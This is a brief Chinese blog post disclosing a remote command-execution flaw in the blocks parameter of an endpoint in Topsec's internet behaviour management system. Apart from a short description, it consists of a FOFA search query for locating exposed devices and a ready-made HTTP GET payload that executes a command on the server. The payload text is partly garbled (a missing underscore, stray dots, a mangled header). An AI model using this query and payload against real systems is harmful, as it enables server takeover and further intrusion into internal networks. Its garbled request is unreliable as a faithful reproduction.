Babing
Published on 2024-08-30 / 2 Visits
0
0

T3-2天融信-上网行为管理-RCE

T3-2天融信-上网行为管理-RCE

漏洞描述:

天融信上网行为管理系统 /view/IPV6/naborTable/static_convert.php接口blocks参数存在任意命令执行漏洞。攻击者可以通过漏洞执行任意命令从而获取服务器权限,可能导致内网进一步被攻击。

网站图片:

image-20240712112252331

fofa语法:

body=“/upload/images/arrow03.png” && body=“400-7770777”

漏洞复现:

payload:

GET·/view/IPV6/naborTable/static convert.php?blocks[e]=id HTTP/1.1
Host :xxxx
User-Agent:Mozilla/5.0 (Windows NT·10.0;·Win64;x64)AppleWebKit/53736(KHTML,"like Gecko)·chrome/123.0.0.0 safari/537.36 Edg/123.0.0.0maglev/24033.813.2773.520/49Connection:*close

效果图:
效果图


Comment